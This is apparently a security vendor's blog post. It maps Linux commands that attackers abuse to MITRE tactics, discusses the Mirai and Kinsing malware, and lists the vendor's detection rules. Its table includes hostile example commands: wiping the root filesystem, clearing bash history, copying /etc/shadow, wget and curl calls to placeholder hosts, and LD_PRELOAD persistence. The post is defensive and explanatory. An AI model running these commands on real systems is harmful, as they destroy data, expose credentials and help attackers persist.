Uptycs Blog

Welcome! The Uptycs blog is for security professionals and osquery enthusiasts interested in exploring new ideas in cloud security. We hope you’ll enjoy our blog enough to subscribe and share.

Linux Commands and Utilities Commonly Used by Attackers

Uptycs' threat research team has observed several instances of Linux malware where the attackers leverage the inbuilt commands and utilities for a wide range of malicious activities.
In this post, we’ll take a look at the Linux commands and utilities commonly used by attackers and how you can use Uptycs EDR detection capabilities to find if these have been used in your environment.

Background

In Linux, several utilities and commands are configured by default. Once an adversary gains access to the system, they can leverage these commands and utilities to get their malware up and loaded quickly with full system privileges. And since these commands and utilities are used by users on a daily basis, it can be extremely difficult to detect malicious activities if they have been used for malicious purposes.
Using the data sources from customer telemetry, MITRE mapping of the detection alerts, threat intelligence systems and our in-house osquery-based sandbox, we identified around 25 commands and utilities that are most commonly used by attackers.

Uptycs EDR has detected and identified malware abusing these commands and utilities using the following MITRE tactics:

  1. Command and Control
  2. Persistence
  3. Privilege Escalation
  4. Defense Evasion
  5. Discovery

We drill down and take a closer look at a few examples in the table below.

Linux commands and utilities used by attackers

Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.

Command / Utility

Techniques

Tactics

Example

arp

Remote System Discovery

Discovery

arp -a

users

System Owner/User Discovery

Discovery

users

netstat

System Network Connections Discovery Linux

Discovery

netstat -plntu

uname

List OS Information

Discovery

uname -a

groups

Enumerate users and groups

Discovery

groups

tcpdump

Packet Capture Linux

Discovery

tcpdump -n > output

LD_PRELOAD=#{path_to_shared_library} ls

Shared Library Injection via LD_PRELOAD

Persistence, Privilege Escalation, Defense Evasion

LD_PRELOAD=”/tmp/wqs.so” /bin/ls

insmod

Loadable Kernel Module based Rootkit

Persistence

sudo insmod rootkit.ko

modprobe

Loadable Kernel Module based Rootkit

Persistence

sudo modprobe -r rootkit.ko

useradd

Create a user account on a Linux System

Persistence

useradd –g 500 –u 500 –s /usr/local/bin/nocando –d /var/spool/vmail

crontab

Schedule task/Job using cron

Persistence

crontab -

rm

Delete Filesystem - Linux

Delete Log Files

Impact

rm -rf / --no-preserve-root

rm -rf /var/logs

kill/pkill

Kill EDR processes

Impact

kill -9 1234

lsmod

Linux VM Check via Kernel Modules

Defense evasion

sudo lsmod | grep -i "vboxsf\|vboxguest"

systemctl

Stop edr services on Linux

Defense evasion

systemctl stop daemon

curl

Malicious User Agents

Command and Control

curl -XPOST #{base64_data}.#{destination_url}

wget

Ingress Tool Transfer

Command and Control

wget http://{IP}:1337/file.sh

chattr

File attributes/permissions modification

Defense Evasion

chattr -i /etc/ld.so.preload

/etc/shadow

Access /etc/shadow (Local)

Persistence, Credential Access

sudo cat /etc/shadow > file

/etc/passwd

Access /etc/passwd (Local)

Enumerate all accounts

Persistence

cat /etc/passwd > file

~/.bash_history

Clear Bash history

Access Bash history

Credential Access, Defense Evasion

echo “” > ~/.bash_history

/etc/sudoers

View sudoers access

Privilege Escalation

vim /etc/sudoers

~/.bashrc

.bash_profile and .bashrc

Persistence

echo “/tmp/qwer” >> ~/.bashrc

~/.bash_profile

.bash_profile and .bashrc

Persistence

echo “/tmp/qwer” >> ~/.bash_profile

/etc/ld.so.preload

Hijack Execution Flow

Persistence, Privilege Escalation, Defense Evasion

echo “/tmp/a.so” >> /etc/ld.so.preload

Table: Commonly exploited Linux commands/utilities

Malware Tactics Using Linux Commands

Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.

Tactic: CnC and Execution

Malware: Mirai

Usage : Commands like wget and curl are most widely seen to download and execute other pieces of malware

Mirai is a malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads the initial shell script on the target system which then executes wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1)

Mirai malware executing wget and curl activities.Figure 1: Mirai malware executing wget and curl activities. (Click to see larger version.)

Uptycs EDR detected the curl and wget activities performed by the malware and also the process activity of Mirai. (See Figure 2)

Uptycs Detection for wget and curl activities by Mirai.Figure 2: Uptycs Detection for wget and curl activities by Mirai. (Click to see larger version.)

Tactic: Persistence, Defense Evasion

Malware: Kinsing

Usage: For persistence and defence evasion mechanism, we have seen adversaries of Kinsing abusing commands like crontab, chattr, or rm and modifying files like ~/.bash_history, /etc/ld.so.preload.

Kinsing is a malware that targets misconfigured Docker services and infects them to run crypto miners. The initial phase of the malware is to download and execute the shell script which then modifies /etc/ld.so.preload and also executes crontab for achieving persistence. (See Figure 3 and 4)

Kinsing modifying /etc/ld.so.preload.Figure 3: Kinsing modifying /etc/ld.so.preload.

Kinsing adding cron job for persistence. Figure 4: Kinsing adding cron job for persistence. 

Uptycs EDR detected the Kinsing malware executing crontab and chattr commands for persistence and defense evasion. (See Figure 5)

Uptycs Detection for Kinsing malware.Figure 5: Uptycs Detection for Kinsing malware. (Click to see larger version.)

In addition to the linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat using process scanning with 10/10 risk score.

Tactic: Discovery

Most Linux servers are used for hosting services mostly using SSH. If SSH is not configured properly, the adversaries may gain access into servers using various techniques like exploiting weak credentials. Once the adversaries get access to the target system, their initial goal is to extract system information for further stages like Exploitation, Privilege Escalation or Persistence. Commands like uname, users, groups, netstat, etc. are most commonly used for initial investigation.

Uptycs EDR detects all the post activities after successful SSH login on our target system. (See Figure 6)

Uptycs Detection for Discovery Techniques.Figure 6: Uptycs Detection for Discovery Techniques. (Click to see larger version.)

Conclusion

By exploiting Linux commands that are used for daily operations, it’s possible that their use for malicious activities are often left unnoticed and stay under the radar. Linux Enterprise administrators should regularly monitor the list of the most commonly used commands in the list above for any suspicious/malicious activities in the system. Current Uptycs customers can see a full list of Event Rules below.

Click below to sign up for a demo and learn more about how the team used Uptycs EDR to identify and detect Linux malware abuses, or how your Blue Team and security analysts can leverage Uptycs EDR to identify attacks. 

See a live demo!

 

Event Rules for Uptycs Customers

The following Uptycs EDR rules are already available to customers to detect above mentioned techniques:

  • Process using ifconfig, ip or arp to get the network configuration - T1016 Discovery under Discovery for Linux
  • Process using who or users utility to get users information - T1033 Discovery under Discovery for Linux
  • Suspicious tool tcpdump launched to capture network traffic - T1040 Discovery for Linux
  • Detected use of curl utility to download file from internet - T1105 Command and Control for Linux
  • Process using groups utility to get group policies - T1069.002 Discovery for Linux
  • Process or script trying to get system information - T1082 System Information Discovery under Discovery for Linux
  • Useradd utility launched to create user account - T1136 Persistence for Linux
  • Detected use of LD_PRELOAD - Likely code injection - T1574.006 Hijack Execution for Linux
  • Scheduled Task by Cron - T1053.003 Persistence_LINUX
  • Process trying to access /etc/ld.so.preload file for persistence - T1055.001 Defense Evasion for Linux
  • Suspicious use of wget to download file in tmp directory - T1105 Command and Control for Linux
  • Process trying to access or modify OS credentials - T1003.008 Credential Access Linux
  • Process trying to access bash history - T1552.003 Credential Access for Linux
    bash_profile or .bashrc file modification - T1156.004 Persistence for Linux
  • Process trying to access /etc/ld.so.preload file for persistence - T1055.001 Defense Evasion for Linux
  • Create or Modify Systemd Service- T1543.002 Persistence_LINUX
  • Data deletion using rm -rf detected - T1485 Impact for Linux
  • Process trying to access /etc/passwd file - T1087.001 Discovery for Linux
  • Process trying to access /etc/sudoers file - T1548.003 Privilege Escalation for Linux
  • Process using crontab utility to add entries in cron jobs - T1053.003 Execution for Linux